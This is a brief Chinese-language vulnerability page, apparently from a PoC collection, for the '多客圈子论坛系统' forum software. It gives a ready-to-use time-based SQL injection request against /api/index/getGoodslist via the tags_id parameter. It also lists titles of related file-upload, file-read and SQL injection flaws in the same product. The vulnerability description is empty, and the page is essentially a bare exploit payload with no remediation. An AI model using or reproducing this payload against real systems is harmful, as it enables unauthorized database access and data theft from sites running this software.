多客圈子论坛系统 /api/index/getGoodslist SQL 注入漏洞

漏洞描述

PoC代码

GET /api/index/getGoodslist?tags_id=1'%29+AND+%28SELECT+1904+FROM+%28SELECT%28SLEEP%285%29%29%29xCMp%29--+OGeQ HTTPS/1.1

相关漏洞推荐

• 多客圈子论坛系统 /index.php/api/User/up_img 文件上传漏洞
• 多客圈子论坛系统 /index.php/api/user/httPGet 文件读取漏洞
• 多客圈子论坛系统 getGoodslist 存在SQL注入漏洞
• 多客圈子论坛系统 getManageinfo SQL注入
• 多客圈子论坛系统 httpGet 任意文件读取漏洞
• 多客圈子论坛系统 /index.php/api/login/httPGet 文件读取漏洞